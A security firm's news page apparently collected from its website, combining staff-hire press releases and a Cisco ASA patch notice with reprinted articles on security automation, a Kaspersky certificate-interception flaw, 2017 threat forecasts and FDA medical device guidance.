Salt Lake City, UT (February 1, 2018) - Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Greg Johnson has joined the company as Vice President of Sales. Greg has over 20 years of experience covering security strategy, business development and direct sales in the Security and Compliance / Audit spaces and has an amazing successful track record of consistently hitting targets increasing revenue year over year. Greg will be working directly with customers using the Secuvant high-touch approach that enables business through risk management and complete security operational excellence with the Secuvant Cyber7™ process.

"Greg fits into the Secuvant model, culture and objectives like a glove. With his background in security and auditing, and as a very senior advisor to clients, he is going to make a huge impact," said Ryan Layton, CEO of Secuvant. "Our clients are lucky to have Greg working with them, and we are very fortunate to have this kind of talent on our team." Greg will be bringing his expertise in ISO 27001, PCI/DSS, HIPAA/HITRUST and excellent relationships to Secuvant to continue the tradition of excellence.

Greg was most recently with A-LIGN as the VP of Business Development where he delivered amazing results for 100's of his clients in Security auditing, compliance, penetration testing and advisory services. In addition, Greg has held positions at CipherTooth as a Board Advisor, Lancera, Access Technology Solutions (Global Access), SecurityMetrics and Novell. Greg holds a BA from Brigham Young University and is also a Payment Card Industry Professional (PCIP).

"From the first time I met the Secuvant team I knew I wanted to be a part of what they were doing," said Greg. "Their approach to the cyber security market is so unique. By focusing on the business side of risk and security and not just tools Secuvant gets it right. Technology is not security without business priority, process and policy! I also wanted to be a part of this team! From the leadership to the analyst these are amazing people that I wanted to be working with. Everyone is talking about Secuvant and their approach and I am very excited to be here."

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fasting growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases, all for less than the cost of hiring internal resources




Summary: Cisco Systems has released a Security Bulletin for CVE-2018-0101. Cisco has also released free software updates that address the vulnerability described in this advisory.

For detailed information on the vulnerability and how to check if you are affected please review the advisory at this link.

Products Affected: This vulnerability affects Cisco ASA Software that is running on the following Cisco products:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)

What should you do: We recommend you check the versions you are running and if needed Patch as soon as possible. Your firewalls are the first line of defense for your network.



Beware of VARs posing as Managed Security Service Providers (MSSP)

Cyber security should be a concern for any company, and especially small and mid-sized businesses (SMB). But this does not mean that those SMBs should turn to their value-added reseller (VAR) or managed IT service partners (MSP) for help. On the contrary, those partners have a clear motivation: Sell you more security tools and IT services, and Cyber Security is not about the hardware and software tools. Those companies who get 80% or 90% of their revenue from resale of vendor tools still must have the motivation to sell more tools in order to fund their new foray into security. With shrinking margins for reselling tools these companies are turning to managed services, including security. This does not make them security experts.

The good news is that the trend is for businesses to turn to a Managed Detection and Response (MDR) provider, which is a great way to reduce costs and risks and get a true security strategy in place. However, if that service is simply a “bolted-on” service that your long-time VAR or MSP is adding in order to capitalize on a hot market, you may be making a mistake. Security is a very deep and technical disciple and takes a clear focus to get right. Spinning up a SEIM tool, collecting logs and installing Anti-virus on your endpoints is not complete security.

Another trend for VARs is to resell or use an MSSP white-labeled service under their logo. This may be a good service from the partner MSSP, but the VAR will typically struggle to add necessary security expertise and security process for a service they may not know a lot about. They may also use security monitoring to position specific hardware they want to sell you to provide the service. In fact, that hardware may be a good control and worth the price, but it needs to be assessed from a risk point of view, not a vendor. Do not get your security strategy from a security product vendor. When you sell hammers, everything looks like a nail.

So, what should you look for when your business needs help with cyber security and you want to keep costs down, risks under control and need a true security partner that focuses on your business and not their bottom line? Here is a quick list to start:

• Pick an MDR partner that provides cyber security only, and that is their sole focus.

• Pick an Independent MSSP/MDR provider that does not sell any hardware or software tools. They will have your interests in mind when recommending controls and tools you may need.

• Use an MDR partner that treats cyber security as a Business Risk, not just a technical one. It is not about the tools. Make sure risk management is part of the MDR service.

• Use an MDR partner that does gap and risk assessments, tied to industry standards, not just glass watching.

• Use a “high touch” MDR partner. Just getting alerts thrown over to you by email is not effective. You need a true security firm that will be your vCISO advisor.

If your SMB needs some help with cyber security then get an MDR service that includes people, process, technology and risk management. Tools will change, and actually this is one of the reasons you want to consider outsourcing your security to an independent MDR partner, so that you get best of breed coverage that you may not be able to afford otherwise. Don’t jump into security services because of a provider’s appliance, firewall, tool or software. Jump in for the right reason, to enable your business. Beware of a VAR in MSSP clothing. You will be glad you did.





Salt Lake City, UT (November 14, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Neal Francom has joined the company as its new Global Security Operation Center (SOC) Manager. Neal brings over 20 years of experience in the information/Cyber Security field, and many more years of experience building successful businesses and programs. Neal will be leading the Secuvant cyberMDR operations practice that delivers unique business-driven co-managed security detection and response services to clients and locations around the world.

“We are incredibly lucky to have Neal lead our SOC. This is not Neal’s first rodeo! His experience is very impressive. Having Neal as part of the Secuvant leadership team shows clients our commitment to excellence and experience,” said Todd Neilson, COO and co-founder of Secuvant. “Neal brings a very unique balance of security leadership experience, team building expertise, and an entrepreneurial spirit to help manage our hyper-growth and process improvement. He is a world-class talent.”

Neal joins Secuvant in his second act after retiring several months ago from the Office of the CISO, in the Information Services and Communications Department of The Church of Jesus Christ of Latter-day Saints. He most recently served as the Information Security and Risk Portfolio Director and Church IT Audit Response Manager. He had also been the Chief of Staff to the CISO and an Assistant CISO over the past 10+ years. He is a seasoned professional with solid IT systems design, cyber security, IT auditing, domestic and international privacy compliance, operations policy/process design, staff planning and training experience.

“I had a number of opportunities after retiring and Secuvant is the most unique security play I have seen” said Neal. “The Business-enabled cyber security platform is not just a sales pitch, it is how we manage our client’s risk. The Secuvant leaders and SOC team are wonderful to work with and I am excited about the future.”

About Secuvant: Secuvant is unique in its product-independent approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fasting growing companies in Utah providing business-drive cyber security solutions including gap and risk assessments, risk management programs, a complete managed detection and response using its state-of-the-art security operations center for the SMB market. Secuvant provides a complete team, tools, technology and processes, and in most cases for less than hiring




Salt Lake City, UT (August 3, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Joe Nelson has joined the company as Vice President of Managed Services. Joe has over 20 years of experience in technical project management and IT operations with amazing skills and experience adding efficiencies to complex processes. Joe will be working directly with Secuvant clients to deliver Secuvant’s enterprise grade cyberMDR Managed Detection and Response services along with Secuvant’s unique risk management program based on the Secuvant Cyber-7™.

“Joe brings an amazing operational skill set to Secuvant managed services that will help our clients see the true business value of cyber security,” said Todd Neilson, President and COO of Secuvant. “Joe’s client facing skills, process automation experience and technical ability is the right combination to deliver on the high-touch model our clients are used to. Joe allows Secuvant to manage our hyper-growth while maintaining an excellent client experience.”

Prior to joining Secuvant Joe spend over twelve years as an Enterprise Network Service Manager for the LDS Church managing global network projects, driving excellence into life-cycle programs and mapping service improvements and demand management. Joe has a technical background as an engineer as well, spending time at Cutthroat Communications and Avalanche Net Wireless.

“This is a great opportunity for me to join a fast paced, fast growing company in the dynamic cyber security space,” said Joe. “Secuvant has something special and unique in how we offer security services that is based on business risk, and not just throwing tools at the problem. I am looking forward to working with Secuvant’s current clients to achieving excellence using the Cyber-7™ methodology, along with helping new companies get real business value as they join Secuvant’s managed services.”

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fasting growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases, all for less than the cost of hiring internal resources.

# # #

If you would like more information about this topic, please contact Jeff Smith, EVP Business Development at 855-SECUVANT or email at




Salt Lake City, UT (July 27, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Matt Sorensen has joined the company as its new Chief Information Security Officer and Vice President of Risk Management. Matt brings 17 years of security experience, over 17 professional certifications in cyber security and 6 years as an Attorney to Secuvant. Sorensen will be leading the Secuvant cyberRPM practice that is focused on bringing real value to businesses through Secuvant’s unique Cyber-7™ risk management methodology.

“Having someone as skilled and well respected as Matt join the Secuvant management team is nothing short of incredible,” said Ryan Layton, CEO and co-founder of Secuvant. “Matt has a very unique combination that is rare to find in cyber security, that being business, legal and technical. He has proven to many businesses and their executives that he is the go-to guy when it comes to cyber risk advisory, and now he can add the Secuvant Cyber-7 methodology that just puts client benefits over the top.”

Prior to joining Secuvant Matt was an attorney with Holland and Hart in Salt Lake City, focused on managing data breach events, overseeing incident response and investigation teams for clients and helping commercial data breach victims prepare civil claims against negligent data custodians and processors. In addition, Matt has worked for the LDS Church as an IT Compliance Officer, US Bank and Bank of America in information security roles and in KPMG’s risk advisory practice. “Secuvant starts by helping executives understand that security is a business risk and not just a technical one,” said Matt. “I am excited to deliver value to our clients using the Cyber-7™ process which is like nothing I’ve seen before. That is what attracted me to Secuvant. The way they help businesses address growing security threats while enabling revenue and lowering risks and costs, is unique in the marketplace.”

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fasting growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases all for less than the cost of hiring internal resources.



Why Automation isn't everything in Cyber Security

Everything is becoming more automated, but what does this really mean or look like for SecOps? How do you evolve with automation while still keeping your analysts?

Secuvant MSSP

By Kumar Saurabh, Contributor, CSO

With the latest advancements in automation and AI, many CISOs are recognizing the potential for automation to transform security operations. Given the way many technology vendors hype their solutions, you could be forgiven for thinking humans should be removed from security flows to the greatest extent possible. But, you would be wrong!

On the contrary, security analysts are not only an important part of the security process, they are THE most important part. So, when you think of automation, you should think of it not as a way of replacing security analysts, but rather as a way of empowering them to do more of what they do best. This is an important distinction.

More automation does not mean a smaller analyst role

The fact is, automation is not a panacea. Certainly, the early and rudimentary forms of automation our industry has seen in the past decade have fallen short of their promise. SIEM systems allow you to collect lots of log data, but the growth in data means ever-increasing amounts of backlog to process. Those same systems, with their inflexible, rules-based approach to threat detection, overwhelm analysts with torrents of false positives.

To make things worse, there are still far too many false negatives and intrusions that get by undetected. No matter what an automation vendor tells you, humans are still the absolute best at identifying previously unknown threats. However, we just can’t do it at scale.

Solving the cybersecurity crisis can’t start with the assumption humans should be automated out of the system - in fact, it should be quite the opposite. In an ideal configuration, human analysts are at the center of everything, supported with advanced automation tools that can make sense of the torrents of data being generated and allowing them to make the types of nuanced decisions that will take a very long time to yield to technology.

Uniting analyst and machine

Some new generation solutions are purely focused on AI and machine learning. The promise is you turn it on in your environment and after a few days of the system learning on its own, it will be able to detect all the bad stuff. However, these systems suffer from a fatal flaw: missing the business context, adaptability and explainability needed to be truly effective.

What do human analysts know better than any system or, more importantly, any intruder? They know their own environment and the enterprise context, as well as having an intuition about how their system operates and what is normal versus what is questionable. Humans also adapt quickly to fast changing conditions and can always explain why they did something. On the other hand, humans cannot scale and could struggle with mistakes and inconsistencies. Machines, as we know, are exponentially faster and consistent.

The ideal system is still one that unites analyst and machine, augmenting the intelligence of a security analyst with the automation scale of a machine. To achieve this, we need the right kind of automation.

There are different types of automation. As explained by Harvard Business Review, basic robotic process automation handles routine and repeatable tasks, and can only scale some of the motions of an analyst, but cannot scale intelligence. Cognitive automation, on the other hand, can handle decision making around the severity of an alert by evaluating the full context of all data surrounding an event. Cognitive automation by itself, however, is not sufficient. To avoid pitfalls of a “blackbox,” automation needs to be complemented by analysts’ input and feedback on a continuous basis. Technology that supports a human-centric approach to automation

Recent, new technologies now make it possible to play to analysts’ strengths far more effectively. The next generation of automation technology allows analysts to feed their tribal knowledge about context and environment easily into the machine learning system, without requiring large training data sets. In addition to drastically increasingly efficacy, this allows a properly designed system to adapt and evolve flexibly as context and environment change. The analyst is in charge and the machine dutifully mimics and executes what the analysts would do, only at extreme scale.

The right automation

Security automation doesn’t mean removing analysts from the equation. Instead, good security automation is about empowering your analysts to force multiply their efforts, aiding them to be more productive and satisfied in their jobs, and freeing them to tackle the most challenging threats. With the right technologies and processes in place, your secops dream team can become a tag team of expert human security analysts plus virtual security analysts powered by cognitive automation.



HTTPS scanning in Kaspersky exposed Users to MITM attacks

From: by: Lucian Constantin

Security vendor Kaspersky Lab has updated its antivirus products to fix an issue that exposed users to traffic interception attacks.

The problem was found by Google vulnerability researcher Tavis Ormandy in the SSL/TLS traffic inspection feature that Kaspersky Anti-Virus uses to detect potential threats hidden inside encrypted connections.

Like other endpoint security products, Kaspersky Anti-Virus installs a self-signed root CA certificate on computers and uses it to issue "leaf," or interception, certificates for all HTTPS-enabled websites accessed by users. This allows the product to decrypt and then re-encrypt connections between local browsers and remote servers.

Ormandy found that whenever the product generates an interception certificate it calculates a 32-bit key based on the serial number of the original certificate presented by the website and caches this relationship. This allows the product to present the cached leaf certificate when the user visits the same website again instead of regenerating it.

The problem, according to Ormandy, is that a 32-bit key is very weak and an attacker could easily craft a certificate that matches the same key, creating a collision.

He described a possible attack as follows: "Mallory wants to intercept traffic, for which the 32bit key is 0xdeadbeef. Mallory sends you the real leaf certificate for, which Kaspersky validates and then generates it's own certificate and key for. On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let's say Now mallory redirects DNS for to, Kaspersky starts using their cached certificate and the attacker has complete control of"

This implies that the attacker -- Mallory in Ormandy's example -- has a man-in-the-middle position on the network that allows him to redirect the user accessing via DNS to a rogue server under his control. That server hosts and presents a certificate for a domain called

Under normal circumstances the browser should display a certificate error, because the certificate for does not match the domain accessed by the client. However, since the browser will actually see the interception certificate generated by Kaspersky Anti-Virus for, and not the original one, it will establish the connection without any error.

The 32-bit key is so weak that certificate collisions would also occur naturally during normal browsing. For example, Ormandy found that the valid certificate used by has the same 32-bit key calculated by Kaspersky Anti-Virus as the certificate for

According to the researcher, Kaspersky Lab pointed out that there is an additional check being performed on the domain name in addition to the 32-bit key. This makes attacks harder, but not impossible.

"We were able to come up with alternative attacks that still worked and Kaspersky resolved it quickly," Ormandy said in an advisory made public Wednesday. The company fixed the issue on Dec. 28, he said.

Security vendors justify their SSL/TLS interception practices through a legitimate need to protect users from all threats, including those served over HTTPS. However, their implementations have often resulted in security issues. That's because performing certificate validation correctly is not easy and is something that browser vendors themselves have perfected over many years.



4 Information Security Events that will Dominate 2017

From: By: Thor Olavsrud

As with previous years, 2016 saw no shortage of data breaches. Looking ahead to 2017, the Information Security Forum (ISF), a global, independent information security body that focuses on cyber security and information risk management, forecasts businesses will face four key global security threats in 2017.

"2016 certainly lived up to expectations," says Steve Durbin, managing director of the ISF. "We saw all sorts of breaches that just seemed to get bigger and bigger. We lurched from one to another. We always anticipate some level of it, but we never anticipate the full extent. I don't think anybody would have anticipated some of the stuff we've seen of late in terms of the Russians getting involved in the recent elections."

The ISF says the top four global security threats businesses will face in 2017 are the following:

  1. Supercharged connectivity and the IoT will bring unmanaged risks.
  2. Crime syndicates will take quantum leap with crime-as-a-service.
  3. New regulations will bring compliance risks.
  4. Brand reputation and trust will be a target.

"The pace and scale of information security threats continues to accelerate, endangering the integrity and reputation of trusted organizations," Durbin says. "In 2017, we will see increased sophistication in the threat landscape with threats being tailored to their target's weak spots or threats mutating to take account of defenses that have been put in place. Cyberspace is the land of opportunity for hacktivists, terrorists and criminals motivated to wreak havoc, commit fraud, steal information or take down corporations and governments. The solution is to prepare for the unknown with an informed threat outlook. Better preparation will provide organizations of all sizes with the flexibility to withstand unexpected, high-impact security events."

The top four threats identified by the ISF are not mutually exclusive. They can combine to create even greater threat profiles.

Supercharged connectivity and the IoT bring unmanaged risks

Gigabit connectivity is on the way, and it will enable the internet of things (IoT) and a new class of applications that will exploit the combination of big data, GPS location, weather, personal health monitoring devices, industrial production and much more. Durbin says that because connectivity is now so affordable and prevalent, we are embedding sensors everywhere, creating an ecosystem of embedded devices that are nearly impossible to secure.

Durbin says this will raise issues beyond privacy and data access: It will expand the threat landscape exponentially.

MORE ON CSO: 6 products that will protect your privacy "The thing for me with 2017 is I describe it as an 'eyes-open stance' we need to take," Durbin says. "We're talking about devices that never ever had security designed into them, devices that are out there gathering information. It's relatively simple to hack into some of these things. We've seen some moves, particularly in the U.S., to encourage IoT manufacturers to engineer some level of security into their devices. But cost is an issue, and they're designed to link."

Durbin believes many organizations are unaware of the scale and penetration of internet-enabled devices and are deploying IoT solutions without due regard to risk management and security. That's not to say organizations should pull away from IoT solutions, but they do need to think about where connected devices are used, what data they have access to and then build security with that understanding in mind.

"Critical infrastructure is one of the key worry areas," Durbin says. "We look at smart cities, industrial control systems — they're all using embedded IoT devices. We have to make sure we are aware of the implications of that."

"You're never going to protect the whole environment, but we're not going to get rid of embedded devices," he adds. "They're already out there. Let's put in some security that allows us to respond and contain as much as possible. We need to be eyes open, realistic about the way we can manage the application of IoT devices."

Crime syndicates take quantum leap with crime-as-a-service

For years now, Durbin says, criminal syndicates have been operating like startups. But like other successful startups, they've been maturing and have become increasingly sophisticated. In 2017, criminal syndicates will further develop complex hierarchies, partnerships and collaborations that mimic large private sector organizations. This, he says, will facilitate their diversification into new markets and the commoditization of their activities at the global levels.

"I originally described them as entrepreneurial businesses, startups," Durbin says. "What we're seeing is a whole maturing of that space. They've moved from the garage to office blocs with corporate infrastructure. They've become incredibly good at doing things that we're bad at: collaborating, sharing, working with partners to plug gaps in their service."

And for many, it is a service offering. While some organizations have their roots in existing criminal structures, other organizations focus purely on cybercrime, specializing in particular areas ranging from writing malware to hosting services, testing, money mule services and more.

"They're interested in anything that can be monetized," Durbin says. "It doesn't matter whether it's intellectual property or personal details. If there is a market, they will go out and collect that information."

He adds that rogue states take advantage of some of these services and notes the ISF expects the resulting cyber incidents in the coming year will be more persistent and damaging than organizations have experienced previously.

New regulations bring compliance risks

The ISF believes the number of data breaches will grow in 2017, and so will the volume of compromised records. The data breaches will become far more expensive for organizations of all sizes, Durbin says. The costs will come from traditional areas such as network clean-up and customer notification, but also from newer areas like litigation involving a growing number of partners.

In addition, public opinion will pressure governments around the world to introduce tighter data protection legislation, which in turn will introduce new and unforeseen costs. Reform is already on the horizon in Europe in the form of the EU General Data Protection Regulation (GDP) and the already-in-effect Network Information Security Directive. Organizations conducting business in Europe will have to get an immediate handle on what data they are collecting on European individuals, where it's coming from, what it's being used for, where and how it's being stored, who is responsible for it and who has access to it. Organizations that fail to do so and are unable to demonstrate security by design will be subject to potentially massive fines.

"The challenge in 2017 for organizations is going to be two-fold," Durbin says. "First is to keep abreast of the changes in regulations across the many, many jurisdictions you operate in. The second piece is then how do you, if you do have clarity like the GDP, how do you ensure compliance with that?"

"The scope of it is just so vast," he adds. "You need to completely rethink the way you collect and secure information. If you're an organization that's been doing business for quite some time and is holding personally identifiable information, you need to demonstrate you know where it is at every stage in the lifecycle and that you're protecting it. You need to be taking reasonable steps even with your third party partners. No information commission I've spoken to expects that, come May 2018, every organization is going to be compliant. But you need to be able to demonstrate that you're taking it seriously. That and the nature of the information that goes missing is going to determine the level of fine they levy against you. And these are big, big fines. The scale of fine available is in a completely different realm than anyone is used to."

Brand reputation and trust are a target

In 2017, criminals won't just be targeting personal information and identity theft. Sensitive corporate information and critical infrastructure has a bull's eye painted on it. Your employees, and their ability to recognize security threats and react properly, will determine how this trend affects your organization.

"With attackers more organized, attacks more sophisticated and threats more dangerous, there are greater risks to an organization's reputation than ever before," Durbin says. "In addition, brand reputation and the trust dynamic that exists amongst customers, partners and suppliers have become targets for cybercriminals and hacktivists. The stakes are higher than ever, and we're no longer talking about merely personal information and identity theft. High-level corporate secrets and critical infrastructure are regularly under attack, and businesses need to be aware of the more important trends that have emerged in the past year, as well as those we forecast in the year to come."

While most information security professionals will point to people as the weakest link in an organization's security, that doesn't have to be the case. People can be an organization's strongest security control, Durbin says, but that requires altering how you think about security awareness and training.

Rather than just making people aware of their information security responsibilities and how they should respond, Durbin says the answer is to embed positive information security behaviors that will cause employees to develop "stop and think" behavior and habits.

"2017 is really about organizations having to wake up to the fact that people do not have to be the weakest link in the security chain," Durbin says. "They can be the strongest link if we do better about understanding how people use technology, the psychology of human behavior."

Successfully doing so requires understanding the various risks faced by employees in different roles and tailoring their work processes to embed security processes appropriate to their roles.



New Cybersecurity Guidelines for Medical Devices Tackle Emerging Threats

From: The Verge By: Rachel Becker

Today, the US Food and Drug Administration released its recommendations for how medical device manufacturers should maintain the security of internet-connected devices, even after they’ve entered hospitals, patient homes, or patient bodies. Unsecured devices can allow hackers to tamper with how much medication is delivered by the device — with potentially deadly results.


First issued in draft form last January, this guidance is more than a year in the making. The 30-page document encourages manufacturers to monitor their medical devices and associated software for bugs, and patch any problems that occur. But the recommendations are not legally enforceable — so they’re largely without teeth.

The FDA has been warning the healthcare industry for years that medical devices are vulnerable to cyberattacks. It’s a legitimate concern: researchers have managed to remotely tamper with devices like defibrillators, pacemakers, and insulin pumps. In 2015, FDA warned hospitals that the Hospira infusion pump, which slowly releases nutrients and medications into a patient’s body, could be accessed and controlled through the hospital’s network. That’s dangerous to patients who could be harmed directly by devices altered to deliver too much or too little medication. It also means poorly-secured devices could give hackers access to hospital networks that store patient information — a situation that’s ripe for identity theft.

“In fact, hospital networks experience constant attempts of intrusion and attack, which can pose a threat to patient safety,” says Suzanne Schwartz, the FDA’s associate director for science and strategic partnerships, in a blog post about the new guidelines. “And as hackers become more sophisticated, these cybersecurity risks will evolve.”


The FDA issued an earlier set of recommendations in October 2014, which recommended ways for manufacturers to build cybersecurity protections into medical devices as they’re being designed and developed. Today’s guidance focuses on how to maintain medical device cybersecurity after devices have left the factory. The guidelines lay out steps for recognizing and addressing ongoing vulnerabilities. And they recommend that manufacturers join together in an Information Sharing and Analysis Organization (ISAO) to share details about security risks and responses as they occur.

Most patches and updates intended to address security vulnerabilities will be considered routine enhancements, which means manufacturers don’t have to alert the FDA every time they issue one. That is, unless someone dies or is seriously harmed because of a bug — then the manufacturer needs to report it. Dangerous bugs identified before they harm or kill anyone won’t have to be reported to the FDA as long as the manufacturer tells customers and device users about the bug within 30 days, fixes it within 60 days, and shares information about the vulnerability with an ISAO.

This attempt to secure medical devices is just the beginning, says Eric Johnson, a cyber security researcher and dean of the Vanderbilt University business school, in an email to The Verge. The FDA’s Schwartz agrees, writing in a blog post: “This is clearly not the end of what FDA will do to address cybersecurity.”



What 2017 Has In Store for Cybersecurity

From: CSO Online By: Gage Skidmore

There is much uncertainty surrounding the security industry for 2017, and according to experts in the field, a lot of the trepidation is directly connected to what the nation’s next president will do.

Here's what security vendors and analysts are predicting for the year ahead.

John B Wood, CEO of Telos Corporation, cites a need for cooperation between the government and the private sector. President-elect Donald Trump took a break from his “thank you” tour to meet with tech executives to smooth over a contentious time between the two sides during his campaign.

“President-elect Trump has been vocal about the need for a stronger and more aggressive cyber security posture, and I’m confident that he’ll work with leading members of Congress. Many non-political cyber experts throughout the government, various agency CISOs and [Federal Chief Information Security Officer] General Touhill will also be great resources to further refine cyber security policies to protect U.S. interests in the face of constantly changing threats,” Wood said.

He also noted the renewed focus on U.S. Cyber Command. The President-elect has promised to eliminate the threat of defense sequestration and to spend more on the military. “This needs to include working to roll back the budget caps for defense spending and providing additional resources for cyber security, including more money for U.S. Cyber Command, which I believe is grossly underfunded,” Wood added.

Speaking of funding, Wood does not believe that a change of administration will automatically lead to a change in regulatory policy.

“Although there will certainly be a big push by the Trump administration to roll back or modify overly burdensome regulations, I don’t see this affecting cybersecurity regulations, like the NIST Cyber Security Framework that has been developed in consultation with the private sector,” he commented.

Reuven Harrison, CTO and co-founder of Tufin, a provider of network security policy orchestration solutions for enterprise cybersecurity, said the thought of a Trump administration inevitably failing to uphold regulations will keep IT departments tossing and turning at night. “If Trump implements his deregulation promises, and penalties for non-compliance with industry-wide security regulations are relaxed, security teams will need to be self-disciplined to maintain a high level of security by turning to outside resources for security best practices,” he said.

Carson Sweet, co-founder and CTO at CloudPassage, said privacy will take center stage over security.

“Trump’s administration will create a fundamental shift in concerns as it pertains to security. There’s a new sheriff in town, and many posit that he has less regard for privacy concerns than the current administration. Case in point, Trump supported the FBI in its battle with Apple over iPhone privacy and security,” Sweet stated. “If this new administration demonstrates in their policies a value for law enforcement and intelligence access over citizens’ privacy, they’ll double or triple down on the government’s right to inspect data. The impact of such a reality would extend to the use of online services, cloud providers, even personal computing devices and IoT.”

What that impact would be is very hard to know, but it’s safe to bet that it won’t be positive, he said. The wars around PGP and personal encryption come to mind (anyone remember the Clipper chip?).

John Bambenek, threat systems manager at Fidelis Cybersecurity, said he never would have predicted last year that we would be talking about the DNC and hacking of elections.

“Ransomware will be on the upswing and evolve in new unforeseen ways. It will be more targeted and focus on more valuable targets as we saw with healthcare. And it will continue to attack new, more damaging industries like we recently witnessed with San Francisco BART and Muni,” he said.

While 2016 found the election under scrutiny because of alleged hacking by foreign powers, 2017 will continue the trend of identity theft and ransomware.

Forrester predicts that within the first 100 days, the new president will face a cybercrisis. The momentum of winning the election gives new presidents the public's support to follow through on key initiatives of their campaigns. However, the 45th president will lose that momentum coming into office by finding the administration facing a cybersecurity incident.

Forrester suggests that the administration prepare for nation-states and ideologies looking to disrupt and degrade. They believe the U.S. should be on the lookout for China, North Korea and Iran.

“Political ideologies use electronic means to both recruit and spread information. DDoS attacks using IoT devices are becoming a common means of disrupting operations for companies or individuals that threat actors disagree with. A company can become a target not just because of its size or global presence but also because of its political donations or public statements. If you’ve never factored geopolitical concerns into your security risk analysis, you ignore them at your own firm’s peril.”

Civilian “casualties” in the Cyber Cold War

Corey Nachreiner, CTO at WatchGuard Technologies, follows Forrester’s way of thinking. “Whether you know it or not, the cyber cold war has started. Nation-states, including U.S., Russia, Israel, and China, have all started both offensive and defensive cyber security operations. Nation-states have allegedly launched malware that damaged nuclear centrifuges, stolen intellectual property from private companies, and even breached other governments' confidential systems. Countries are hacking for espionage, crime investigation, and even to spread propaganda and disinformation.”

"Trump’s administration will create a fundamental shift in concerns as it pertains to security." -- Carson Sweet, CTO, CloudPassage

He believes 2017 will be much of the same: Behind the scenes, nation-states have been leveraging undiscovered vulnerabilities in their attacks, suggesting that these countries have been finding, purchasing, and hording zero-day flaws in software to power their future cyber campaigns.

“In other words, the nation-state cyber cold war is an arms race to discover and horde software vulnerabilities — often ones in the private software we all use every day,” he said.



Experts Predict 2017's Biggest Cybersecurity Threats

If 2016 was the year hacking went mainstream, 2017 will be the year hackers innovate, said Adam Meyer, chief security strategist at SurfWatch Labs. Meyer analyzes large and diverse piles of data to help companies identify emerging cyber-threat trends. "2017 will be the year of increasingly creative [hacks]," he said. In the past, cybersecurity was considered the realm of IT departments, Meyer explained, but no longer. As smart companies systematically integrate security into their systems, the culture hackers too will evolve.

"Cybercriminals follow the money trail," Meyer said, and smart companies should adopt proactive policies. Ransomware attacks grew quickly, he said, because the attacks are "cheap to operate, and many organizations are not yet applying the proper analysis and decision-making to appropriately defend against this threat."

SEE: How risk analytics can help your organization plug security holes (Tech Pro Research)

It's equally cheap to identify internal vulnerability to hacks and to apply preventative best practices, Meyer said. But for many companies it's not as easy to understand the cybersecurity threats most likely to impact business. To help, TechRepublic spoke with a number of prominent security experts about their predictions for near-future cybersecurity trends likely to impact enterprise and small business in 2017.

Cyber-offense and cyber-defense capacities will increase - Mark Testoni, CEO at SAP's national security arm, NS2

We will see an increased rate of sharing of cyber capabilities between the commercial and government spaces. Commercial threat intelligence capabilities will be adopted more broadly by organizations and corporations... High performance computing (HPC), in conjunction with adaptive machine learning (ML) capabilities, will be an essential part of network flow processing because forensic analysis can't stop an impending attack. HPC + adaptive ML capabilities will be required to implement real-time network event forecasting based on prior network behavior and current network operations... [Companies will] use HPC and adaptive ML to implement real-time behavior and pattern analysis to evaluate all network activity based on individual user roles and responsibilities to identify potential individuals within an organization that exhibit "out of the ordinary" tendencies with respect to their use of corporate data and application access.

Ransomware and extortion will increase - Stephen Gates, chief research intelligence analyst at NSFOCUS

The days of single-target ransomware will soon be a thing of the past. Next-generation ransomware paints a pretty dark picture as the self-propagating worms of the past, such as Conficker, Nimda, and Code Red, will return to prominence—but this time they will carry ransomware payloads capable of infecting hundreds of machines in an incredibly short timespan. We have already seen this start to come to fruition with the recent attack on the San Francisco Municipal Transport Agency, where over 2,000 systems were completely locked with ransomware and likely spread on its own as a self-propagating worm. As cybercriminals become more adept at carrying out these tactics, there is a good chance that these attacks will become more common.

As more devices become internet-enabled and accessible and the security measures in place continue to lag behind, the associated risks are on the rise. Aside from the obvious risks for attacks on consumer IoT devices, there is a growing threat against industrial and municipal IoT as well. As leading manufacturers and grid power producers transition to Industry 4.0, sufficient safeguards are lacking. Not only do these IoT devices run the risk of being used to attack others, but their vulnerabilities leave them open to being used against the industrial organizations operating critical infrastructure themselves. This can lead to theft of intellectual property, collecting competitive intelligence, and even the disruption or destruction of critical infrastructure. Not only is the potential scale of these attacks larger, most of these industrial firms do not have the skills in place to deal with web attacks in real-time, which can cause long-lasting, damaging results. This alone will become one of the greatest threats that countries and corporations need to brace themselves for in 2017 and beyond.

Industrial IoT hacks will increase - Adam Meyer, chief security strategist at SurfWatch Labs

Internal threats will increase - James Maude, senior security engineer at Avecto

